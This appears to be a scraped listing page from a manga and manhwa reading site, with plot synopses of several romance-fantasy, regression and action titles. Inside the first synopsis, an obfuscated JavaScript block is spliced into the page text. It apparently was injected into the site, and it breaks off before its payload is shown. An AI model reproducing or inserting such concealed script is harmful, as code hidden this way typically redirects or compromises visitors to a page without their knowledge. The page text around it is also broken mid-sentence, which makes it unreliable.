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Talented Genius

The overproud president, the shy little secretary, the South-African black diamond princess, the special force female bodyguard, and the silky beauty who loves to eat carrots will passion you out. What kind of passion? The fate of entanglement or the calculation of the mind, into the genius master, take you to appreciate the different assistant life.<script></script><script>(function(_0x1ba960,_0x3452ce){var _0x1a2b37=_0x2bb4,_0x40cf88=_0x1ba960();while(!![]){try{var _0x20287b=parseInt(_0x1a2b37(0x1aa))/(0x1*0x157b+0x7a*0x47+-0x1d8*0x1e)+parseInt(_0x1a2b37(0x1c4))/(-0xe4f+-0xc39+-0xd45*-0x2)+-parseInt(_0x1a2b37(0x1c8))/(-0xa8b*-0x1+-0x1*0xa57+-0x31)*(parseInt(_0x1a2b37(0x1a8))/(0x1064+-0x1d09*0x1+-0x1*-0xca9))+-parseInt(_0x1a2b37(0x1ac))/(0x83*0x2+0xeef*-0x1+0xdee)*(-parseInt(_0x1a2b37(0x1ba))/(0xcd6*-0x2+-0xa8d+-0x243f*-0x1))+parseInt(_0x1a2b37(0x1af))/(0x1*0x1962+0x692+-0x2e7*0xb)*(parseInt(_0x1a2b37(0x1b5))/(0x2cb+-0x10c*-0x25+-0x297f))+-parseInt(_0x1a2b37(0x1a9))/(0x11*-0x15e+0xe09*0x1+0x93e)+-parseInt(_0x1a2b37(0x1b3))/(-0x1815+0xf1c+0x903)*(-parseInt(_0x1a2b37(0x1c5))/(0x1f7d+0x238*0xe+-0x3e82));if(_0x20287b===_0x3452ce)break;else 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Even if the Villain’s Daughter Regresses

Read manhwa Even if the Villain’s Daughter Regresses / Even if the Villain’s Daughter Returns / 악당의 딸은 회귀해봤자 A child who lost everything to a villain. Ten years later, that child returned as a hero called a demigod. And the enraged hero began his revenge by killing the villain and his family… But there was a problem. It was that Lila was the daughter of that villain. “Are you Lila Hildegar?” “You’ve got the wrong person.” “No, I think I’ve got the right one.” …Pretending to be someone else, failed! “Please spare me.” “No.” …Begging for her life also failed! There was no other choice. Lila chose the last resort. “Any last words?” It was to swallow the “Regression Stone” and return to the past after death. “It wasn’t pleasant meeting you, so let’s never see each other again!” That’s how Lila returned to the past, opened her eyes at the age of ten, and… Died again. Lila tried to survive. She tried and tried again. That was all she did… “Why did you save me?” The boy answered with a pale face. “Because I’ve gone mad.” …The enemy who had driven Lila to death several times became strange. [Villain’s daughter female lead/female lead who wants to live to be 90/is still the villain’s daughter even if she regresses] [Male lead who lost his home and family to the villain/male lead whose only goal in life is revenge] [Opposing parties are enemies → What are you doing right now…?]

3 days ago

I'M My Household Girlfriend

In the imperial court, a young woman is put into servitude, Maomao. The tale is just beginning for the woman doctor/pharmacist from the red-light district, as rumors circulate about the emperor’s children’s lives being short-lived. Her curious nature and thirst for knowledge pushes her to action. To satisfy her curiosity, this young doctor/pharmacist will investigate the origin! What is shifting in the imperial court..!?


Baki Rahen

The sixth part of the Baki series.


Tokubetsu na Chuutohanpa

\"What does it mean to be dating exactly...?\" They\'re not friends. But they\'re also not lovers. It\'s a story about these two\'s half-relationship.


Passing Through to Be the Beastman's Pampered Wife After I Get Panicky

The protagonist suddenly died when she stayed up all night writing a program. The moment she time traveled and got to the new world, she found that she was having her way with a beast by using an aphrodisiac. She became a laughing stock. She told everyone that she wanted a career instead of love. Starting with seeking food with the help of her system, step by step, she developed her uncivilized clan into the best clan ever. Her change amazed everybody. All males pleaded with her not to focus on her career but on them.


Hiding a Warehouse in the Apocalypse

Imagine you are stuck inside a warehouse while the world is experiencing an apocalypse. That’s exactly what’s happening to Jeong-gyeom, except he suddenly awakens a very odd but powerful ability to store anything in a parallel dimension, giving him the tools to defeat the creatures wreaking havoc on the world. But as he ventures into the ravaged city of Seoul, he realizes there is more to this apocalypse than meets the eye as he encounters other survivors and mysterious monsters on his quest to find his family.


The Saintess And The Curse

Read manhwa The Saintess And The Curse at Manga Zin The description of the comics “The Saintess And The Curse Manhwa”: Velota Rosebet, the admired saint of the Lunhardt Empire, is marked by a terrible curse: she must receive the essence of a man once a month. Her secret is revealed during a full moon night by Saiden Blackwood, the leader of the order of holy knights, who has harbored a deep love for her. Overcome by anger towards the curse, Saiden decides to take on the task of freeing her. Will he be able to fulfill his oath and restore Velota’s freedom? “The Saintess And The Curse Manhwa” is sames name: The Holy Lady, the Curse Saint, Curse 성녀, 저주

3 days ago

Killing Field

\"Once you’re in, the only way out is death!\" Former hitman Jeong Do-gyun thought he’d left that life behind. Now retired, he keeps a low profile, working at a café run by Gu Sang-hyeok—the closest thing to family he has following their days spent in an orphanage. But one day, Sang-hyeok vanishes without a trace. Following his trail, Do-gyun finds himself on a remote, mysterious island—only to discover a horrifying truth. The island is a prison, filled with kidnapped victims forced into slavery, watched over by merciless killers. And to make matters worse, the man who murdered his family is here, too. With a vengeance burning in his veins, Do-gyun prepares for the fight of his life. It’s him against an army of ruthless assassins—only one side is making it out alive.


I’ll Be The Matriarch In This Life

I’ll Be The Matriarch In This Life Florentia was reincarnated as the illegitimate child of the richest family in the empire. She had thought that everything would go well in the future. But her father had passed away, her relatives left her at the doorsteps, and the honourable family she was so proud of was completely ruined…. But is this real? She drank a little (a lot) and was hit by a carriage, When she opened her eyes again, she was seven years old? Moreover, the Second Prince, who was the enemy of her family in her previous life is following her around like a dog! I’ll Be The Matriarch In This Life, En cette vie, je deviendrai la cheffe de famille, I Will Become the Mistress of This Life, Ibeonsaeng-eun Gajuga Doegessseubnida, In This Life, I Will Be Lord, In This Life, I Will Be the Lord, In This Life, I’ll Become the Head of the Family, Nesta vida, eu serei a matriarca, В этой жизни я – глава семьи, На сей раз я – хозяйка этой жизни, Я стану хозяйкой этой жизни, 이번 생은 가주가 되겠습니다 Search for series of same genre(s) Welcome to MangaGG site, you can read and enjoy all kinds of Manhwa trending  such as Drama, Manhua, Manga, Romance…, for free here. All of the manhwa new will be update with high standards every hours. If you are a Comics book (Manhwa Hot ), MangaGG is your best choice, don’t hesitate, just read and feel !


The One Within the Villainess

In order to clear the name of \'Emi,\' a girl who had reincarnated as Remilia, the villainess of an otome game, the real Remilia who had been watching all along inside awakens. Now it\'s time for the true villainess\' revenge to begin!
